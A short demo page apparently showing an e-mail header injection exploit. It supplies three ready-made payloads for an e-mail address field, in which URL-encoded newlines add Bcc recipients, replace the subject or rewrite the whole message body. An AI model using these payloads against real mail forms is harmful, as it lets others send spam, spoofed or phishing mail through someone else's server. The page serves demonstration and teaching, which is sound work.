This demo demonstrates the e-mail injection exploit. To test, enter [email protected]%0ABcc:[email protected],[email protected] as your e-mail address, or enter [email protected]%0ASubject:My%20Anonymous%20Subject (changes the subject), or even [email protected]%0AContent-Type:multipart/mixed;%20boundary=frog;%0A--frog%0AContent-Type:text/html%0A%0AMy%20New%20Message.%0A--frog-- (which completely changes the e-mail) as your e-mail address.